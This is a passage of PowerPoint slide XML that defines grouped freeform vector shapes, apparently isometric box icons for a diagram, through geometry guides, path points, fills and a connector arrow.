                    <a:gd name="T4" fmla="*/ 0 w 10"/>
                    <a:gd name="T5" fmla="*/ 0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" h="165">
                      <a:moveTo>
                        <a:pt x="8" y="165"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="131"/>
                        <a:pt x="10" y="16"/>
                        <a:pt x="9" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="8"/>
                        <a:pt x="0" y="7"/>
                        <a:pt x="0" y="0"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:noFill/>
                <a:ln w="6350" cap="rnd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46" name="Group 930">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05F91CD7-F41D-472D-B2E5-8B330963F5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85" y="2279"/>
                <a:ext cx="635" cy="270"/>
                <a:chOff x="-1652" y="6058"/>
                <a:chExt cx="2253" cy="954"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1756" name="Freeform 931">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22E31300-9723-4C32-A0FA-D1D1D2DBB61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50" y="6058"/>
                  <a:ext cx="451" cy="590"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 451"/>
                    <a:gd name="T1" fmla="*/ 0 h 590"/>
                    <a:gd name="T2" fmla="*/ 0 w 451"/>
                    <a:gd name="T3" fmla="*/ 470 h 590"/>
                    <a:gd name="T4" fmla="*/ 451 w 451"/>
                    <a:gd name="T5" fmla="*/ 590 h 590"/>
                    <a:gd name="T6" fmla="*/ 451 w 451"/>
                    <a:gd name="T7" fmla="*/ 123 h 590"/>
                    <a:gd name="T8" fmla="*/ 0 w 451"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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1" h="590">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="470"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="451" y="590"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="451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57" name="Freeform 932">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C4D7B19-5F43-466F-AE6B-86192157E2D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752" y="6256"/>
                  <a:ext cx="1353" cy="362"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1353"/>
                    <a:gd name="T1" fmla="*/ 241 h 362"/>
                    <a:gd name="T2" fmla="*/ 902 w 1353"/>
                    <a:gd name="T3" fmla="*/ 0 h 362"/>
                    <a:gd name="T4" fmla="*/ 1353 w 1353"/>
                    <a:gd name="T5" fmla="*/ 121 h 362"/>
                    <a:gd name="T6" fmla="*/ 454 w 1353"/>
                    <a:gd name="T7" fmla="*/ 362 h 362"/>
                    <a:gd name="T8" fmla="*/ 0 w 1353"/>
                    <a:gd name="T9" fmla="*/ 241 h 3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3" h="362">
                      <a:moveTo>
                        <a:pt x="0" y="241"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="902" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1353" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="454" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="2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58" name="Freeform 933">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1246ADE0-BF21-4251-91BD-9B883726A87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298" y="6181"/>
                  <a:ext cx="899" cy="708"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 899"/>
                    <a:gd name="T1" fmla="*/ 241 h 708"/>
                    <a:gd name="T2" fmla="*/ 0 w 899"/>
                    <a:gd name="T3" fmla="*/ 708 h 708"/>
                    <a:gd name="T4" fmla="*/ 899 w 899"/>
                    <a:gd name="T5" fmla="*/ 467 h 708"/>
                    <a:gd name="T6" fmla="*/ 899 w 899"/>
                    <a:gd name="T7" fmla="*/ 0 h 708"/>
                    <a:gd name="T8" fmla="*/ 0 w 899"/>
                    <a:gd name="T9" fmla="*/ 241 h 7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99" h="708">
                      <a:moveTo>
                        <a:pt x="0" y="241"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="708"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="899" y="467"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="899" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="241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59" name="Freeform 934">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B512C0CC-F149-4157-B840-975163E9D99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750" y="6353"/>
                  <a:ext cx="452" cy="536"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 196 w 452"/>
                    <a:gd name="T1" fmla="*/ 0 h 536"/>
                    <a:gd name="T2" fmla="*/ 196 w 452"/>
                    <a:gd name="T3" fmla="*/ 196 h 536"/>
                    <a:gd name="T4" fmla="*/ 0 w 452"/>
                    <a:gd name="T5" fmla="*/ 144 h 536"/>
                    <a:gd name="T6" fmla="*/ 0 w 452"/>
                    <a:gd name="T7" fmla="*/ 416 h 536"/>
                    <a:gd name="T8" fmla="*/ 452 w 452"/>
                    <a:gd name="T9" fmla="*/ 536 h 536"/>
                    <a:gd name="T10" fmla="*/ 452 w 452"/>
                    <a:gd name="T11" fmla="*/ 69 h 536"/>
                    <a:gd name="T12" fmla="*/ 196 w 452"/>
                    <a:gd name="T13" fmla="*/ 0 h 5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52" h="536">
                      <a:moveTo>
                        <a:pt x="196" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="196" y="196"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="144"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="416"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="536"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19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60" name="Freeform 935">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13C6A665-F533-4193-BF91-D9FA2058912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554" y="6058"/>
                  <a:ext cx="1155" cy="364"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 707 w 1155"/>
                    <a:gd name="T1" fmla="*/ 0 h 364"/>
                    <a:gd name="T2" fmla="*/ 452 w 1155"/>
                    <a:gd name="T3" fmla="*/ 68 h 364"/>
                    <a:gd name="T4" fmla="*/ 645 w 1155"/>
                    <a:gd name="T5" fmla="*/ 123 h 364"/>
                    <a:gd name="T6" fmla="*/ 0 w 1155"/>
                    <a:gd name="T7" fmla="*/ 295 h 364"/>
                    <a:gd name="T8" fmla="*/ 256 w 1155"/>
                    <a:gd name="T9" fmla="*/ 364 h 364"/>
                    <a:gd name="T10" fmla="*/ 1155 w 1155"/>
                    <a:gd name="T11" fmla="*/ 123 h 364"/>
                    <a:gd name="T12" fmla="*/ 707 w 1155"/>
                    <a:gd name="T13" fmla="*/ 0 h 3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55" h="364">
                      <a:moveTo>
                        <a:pt x="707" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="452" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="645" y="123"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="295"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="256" y="364"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1155" y="123"/>
                      </a:ln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777777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61" name="Freeform 936">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D35C57A-6C77-4E9A-84B1-D2FF30FFF19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1652" y="6233"/>
                  <a:ext cx="454" cy="536"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 255 w 454"/>
                    <a:gd name="T1" fmla="*/ 0 h 536"/>
                    <a:gd name="T2" fmla="*/ 258 w 454"/>
                    <a:gd name="T3" fmla="*/ 196 h 536"/>
                    <a:gd name="T4" fmla="*/ 454 w 454"/>
                    <a:gd name="T5" fmla="*/ 144 h 536"/>
                    <a:gd name="T6" fmla="*/ 454 w 454"/>
                    <a:gd name="T7" fmla="*/ 415 h 536"/>
                    <a:gd name="T8" fmla="*/ 0 w 454"/>
                    <a:gd name="T9" fmla="*/ 536 h 536"/>
                    <a:gd name="T10" fmla="*/ 0 w 454"/>
                    <a:gd name="T11" fmla="*/ 68 h 536"/>
                    <a:gd name="T12" fmla="*/ 255 w 454"/>
                    <a:gd name="T13" fmla="*/ 0 h 5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54" h="536">
                      <a:moveTo>
                        <a:pt x="255" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="258" y="196"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="454" y="144"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="454" y="415"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="536"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25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62" name="Freeform 937">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68057C68-BA93-4D2B-A151-EE86FEAE349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1652" y="6377"/>
                  <a:ext cx="1354" cy="363"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1354 w 1354"/>
                    <a:gd name="T1" fmla="*/ 241 h 363"/>
                    <a:gd name="T2" fmla="*/ 454 w 1354"/>
                    <a:gd name="T3" fmla="*/ 0 h 363"/>
                    <a:gd name="T4" fmla="*/ 0 w 1354"/>
                    <a:gd name="T5" fmla="*/ 120 h 363"/>
                    <a:gd name="T6" fmla="*/ 902 w 1354"/>
                    <a:gd name="T7" fmla="*/ 363 h 363"/>
                    <a:gd name="T8" fmla="*/ 1354 w 1354"/>
                    <a:gd name="T9" fmla="*/ 241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4" h="363">
                      <a:moveTo>
                        <a:pt x="1354" y="241"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="454" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="902" y="363"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1354" y="2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63" name="Freeform 938">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D03EC13-FF51-476D-8BA3-60B2DEE0BC3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1652" y="6233"/>
                  <a:ext cx="1354" cy="309"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1157 w 1354"/>
                    <a:gd name="T1" fmla="*/ 240 h 309"/>
                    <a:gd name="T2" fmla="*/ 1354 w 1354"/>
                    <a:gd name="T3" fmla="*/ 189 h 309"/>
                    <a:gd name="T4" fmla="*/ 1098 w 1354"/>
                    <a:gd name="T5" fmla="*/ 120 h 309"/>
                    <a:gd name="T6" fmla="*/ 900 w 1354"/>
                    <a:gd name="T7" fmla="*/ 172 h 309"/>
                    <a:gd name="T8" fmla="*/ 255 w 1354"/>
                    <a:gd name="T9" fmla="*/ 0 h 309"/>
                    <a:gd name="T10" fmla="*/ 0 w 1354"/>
                    <a:gd name="T11" fmla="*/ 68 h 309"/>
                    <a:gd name="T12" fmla="*/ 902 w 1354"/>
                    <a:gd name="T13" fmla="*/ 309 h 309"/>
                    <a:gd name="T14" fmla="*/ 1157 w 1354"/>
                    <a:gd name="T15" fmla="*/ 240 h 3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54" h="309">
                      <a:moveTo>
                        <a:pt x="1157" y="240"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="1354" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1098" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="900" y="172"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="902" y="309"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1157" y="240"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="777777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64" name="Freeform 939">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7CBC9EE-2A14-4765-9F85-A88BCAC1BD0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1652" y="6301"/>
                  <a:ext cx="902" cy="709"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 902 w 902"/>
                    <a:gd name="T1" fmla="*/ 241 h 709"/>
                    <a:gd name="T2" fmla="*/ 900 w 902"/>
                    <a:gd name="T3" fmla="*/ 709 h 709"/>
                    <a:gd name="T4" fmla="*/ 0 w 902"/>
                    <a:gd name="T5" fmla="*/ 468 h 709"/>
                    <a:gd name="T6" fmla="*/ 0 w 902"/>
                    <a:gd name="T7" fmla="*/ 0 h 709"/>
                    <a:gd name="T8" fmla="*/ 902 w 902"/>
                    <a:gd name="T9" fmla="*/ 241 h 7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02" h="709">
                      <a:moveTo>
                        <a:pt x="902" y="241"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="900" y="709"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="468"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="902" y="241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65" name="Freeform 940">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EAB53D9-CE8E-485C-AE82-69BDCD74AB6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-752" y="6422"/>
                  <a:ext cx="454" cy="590"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 257 w 454"/>
                    <a:gd name="T1" fmla="*/ 51 h 590"/>
                    <a:gd name="T2" fmla="*/ 454 w 454"/>
                    <a:gd name="T3" fmla="*/ 0 h 590"/>
                    <a:gd name="T4" fmla="*/ 454 w 454"/>
                    <a:gd name="T5" fmla="*/ 196 h 590"/>
                    <a:gd name="T6" fmla="*/ 454 w 454"/>
                    <a:gd name="T7" fmla="*/ 467 h 590"/>
                    <a:gd name="T8" fmla="*/ 0 w 454"/>
                    <a:gd name="T9" fmla="*/ 590 h 590"/>
                    <a:gd name="T10" fmla="*/ 2 w 454"/>
                    <a:gd name="T11" fmla="*/ 120 h 590"/>
                    <a:gd name="T12" fmla="*/ 257 w 454"/>
                    <a:gd name="T13" fmla="*/ 51 h 5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54" h="590">
                      <a:moveTo>
                        <a:pt x="257" y="51"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="454" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="454" y="196"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="454" y="467"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="590"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="51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47" name="Group 1137">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F399DBB2-7523-4D67-BDE5-8E16A6AFCF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26" y="2217"/>
                <a:ext cx="124" cy="96"/>
                <a:chOff x="2155" y="1811"/>
                <a:chExt cx="675" cy="523"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1748" name="Freeform 1138">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{533006ED-9CC4-4880-A4C6-99B497A154F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90" y="1818"/>
                  <a:ext cx="314" cy="433"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 4460"/>
                    <a:gd name="T1" fmla="*/ 0 h 6160"/>
                    <a:gd name="T2" fmla="*/ 0 w 4460"/>
                    <a:gd name="T3" fmla="*/ 4972 h 6160"/>
                    <a:gd name="T4" fmla="*/ 4460 w 4460"/>
                    <a:gd name="T5" fmla="*/ 6160 h 6160"/>
                    <a:gd name="T6" fmla="*/ 4460 w 4460"/>
                    <a:gd name="T7" fmla="*/ 1188 h 6160"/>
                    <a:gd name="T8" fmla="*/ 0 w 4460"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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60" h="6160">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="4972"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4460" y="6160"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4460" y="11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350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="tx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49" name="Freeform 1139">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A765F05-9E39-43C5-BDD9-25D336D95C9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3" y="1850"/>
                  <a:ext cx="268" cy="332"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 3803"/>
                    <a:gd name="T1" fmla="*/ 0 h 4725"/>
                    <a:gd name="T2" fmla="*/ 0 w 3803"/>
                    <a:gd name="T3" fmla="*/ 3711 h 4725"/>
                    <a:gd name="T4" fmla="*/ 3803 w 3803"/>
                    <a:gd name="T5" fmla="*/ 4725 h 4725"/>
                    <a:gd name="T6" fmla="*/ 3803 w 3803"/>
                    <a:gd name="T7" fmla="*/ 1014 h 4725"/>
                    <a:gd name="T8" fmla="*/ 0 w 3803"/>
                    <a:gd name="T9" fmla="*/ 0 h 47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03" h="4725">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="3711"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3803" y="4725"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3803" y="10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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="tx1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50" name="Freeform 1140">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{413CFD1B-2579-49AE-8B8D-15DD764097F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90" y="1811"/>
                  <a:ext cx="340" cy="90"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 4831 w 4831"/>
                    <a:gd name="T1" fmla="*/ 1189 h 1288"/>
                    <a:gd name="T2" fmla="*/ 4460 w 4831"/>
                    <a:gd name="T3" fmla="*/ 1288 h 1288"/>
                    <a:gd name="T4" fmla="*/ 0 w 4831"/>
                    <a:gd name="T5" fmla="*/ 100 h 1288"/>
                    <a:gd name="T6" fmla="*/ 368 w 4831"/>
                    <a:gd name="T7" fmla="*/ 0 h 1288"/>
                    <a:gd name="T8" fmla="*/ 4831 w 4831"/>
                    <a:gd name="T9" fmla="*/ 1189 h 1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31" h="1288">
                      <a:moveTo>
                        <a:pt x="4831" y="1189"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4460" y="1288"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="100"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="368" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4831" y="118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350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="tx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51" name="Freeform 1141">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A72DC636-A9A0-4916-8445-6EBB3EA596F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155" y="2127"/>
                  <a:ext cx="675" cy="181"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 9603"/>
                    <a:gd name="T1" fmla="*/ 1287 h 2577"/>
                    <a:gd name="T2" fmla="*/ 4802 w 9603"/>
                    <a:gd name="T3" fmla="*/ 0 h 2577"/>
                    <a:gd name="T4" fmla="*/ 9603 w 9603"/>
                    <a:gd name="T5" fmla="*/ 1287 h 2577"/>
                    <a:gd name="T6" fmla="*/ 4802 w 9603"/>
                    <a:gd name="T7" fmla="*/ 2577 h 2577"/>
                    <a:gd name="T8" fmla="*/ 0 w 9603"/>
                    <a:gd name="T9" fmla="*/ 1287 h 25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603" h="2577">
                      <a:moveTo>
                        <a:pt x="0" y="1287"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4802" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9603" y="1287"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4802" y="2577"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="128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350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="tx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52" name="Freeform 1142">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CAE6ECA-76BC-4451-A9EC-D53574CD43A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93" y="2218"/>
                  <a:ext cx="337" cy="116"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 4801"/>
                    <a:gd name="T1" fmla="*/ 1290 h 1656"/>
                    <a:gd name="T2" fmla="*/ 0 w 4801"/>
                    <a:gd name="T3" fmla="*/ 1656 h 1656"/>
                    <a:gd name="T4" fmla="*/ 4801 w 4801"/>
                    <a:gd name="T5" fmla="*/ 369 h 1656"/>
                    <a:gd name="T6" fmla="*/ 4801 w 4801"/>
                    <a:gd name="T7" fmla="*/ 0 h 1656"/>
                    <a:gd name="T8" fmla="*/ 0 w 4801"/>
                    <a:gd name="T9" fmla="*/ 1290 h 16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01" h="1656">
                      <a:moveTo>
                        <a:pt x="0" y="1290"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="1656"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4801" y="369"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4801" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="129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350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="tx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53" name="Freeform 1143">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DEA3588-B94B-4E75-A301-93706C570C8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155" y="2218"/>
                  <a:ext cx="338" cy="116"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 4802 w 4802"/>
                    <a:gd name="T1" fmla="*/ 1656 h 1656"/>
                    <a:gd name="T2" fmla="*/ 0 w 4802"/>
                    <a:gd name="T3" fmla="*/ 369 h 1656"/>
                    <a:gd name="T4" fmla="*/ 0 w 4802"/>
                    <a:gd name="T5" fmla="*/ 0 h 1656"/>
                    <a:gd name="T6" fmla="*/ 4802 w 4802"/>
                    <a:gd name="T7" fmla="*/ 1290 h 1656"/>
                    <a:gd name="T8" fmla="*/ 4802 w 4802"/>
                    <a:gd name="T9" fmla="*/ 1656 h 16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02" h="1656">
                      <a:moveTo>
                        <a:pt x="4802" y="1656"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="369"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4802" y="1290"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4802" y="1656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350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="tx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54" name="Freeform 1144">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1A0DF96-DE90-4C4E-B5F2-749B4DCBF3A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51" y="2157"/>
                  <a:ext cx="457" cy="122"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 6492"/>
                    <a:gd name="T1" fmla="*/ 654 h 1743"/>
                    <a:gd name="T2" fmla="*/ 4061 w 6492"/>
                    <a:gd name="T3" fmla="*/ 1743 h 1743"/>
                    <a:gd name="T4" fmla="*/ 6492 w 6492"/>
                    <a:gd name="T5" fmla="*/ 1091 h 1743"/>
                    <a:gd name="T6" fmla="*/ 2431 w 6492"/>
                    <a:gd name="T7" fmla="*/ 0 h 1743"/>
                    <a:gd name="T8" fmla="*/ 0 w 6492"/>
                    <a:gd name="T9" fmla="*/ 654 h 1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92" h="1743">
                      <a:moveTo>
                        <a:pt x="0" y="654"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4061" y="1743"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6492" y="1091"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2431" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="654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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="tx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55" name="Freeform 1145">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDD32CAE-4AD0-488F-8040-DB4114F5477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04" y="1894"/>
                  <a:ext cx="26" cy="357"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 371"/>
                    <a:gd name="T1" fmla="*/ 5071 h 5071"/>
                    <a:gd name="T2" fmla="*/ 371 w 371"/>
                    <a:gd name="T3" fmla="*/ 4972 h 5071"/>
                    <a:gd name="T4" fmla="*/ 371 w 371"/>
                    <a:gd name="T5" fmla="*/ 0 h 5071"/>
                    <a:gd name="T6" fmla="*/ 0 w 371"/>
                    <a:gd name="T7" fmla="*/ 99 h 5071"/>
                    <a:gd name="T8" fmla="*/ 0 w 371"/>
                    <a:gd name="T9" fmla="*/ 5071 h 50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1" h="5071">
                      <a:moveTo>
                        <a:pt x="0" y="5071"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="371" y="4972"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="371" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="99"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="5071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350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="tx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1732" name="Straight Arrow Connector 1731">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F164A764-CF05-46D5-A71C-08327D442C6D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:endCxn id="2056" idx="15"/>
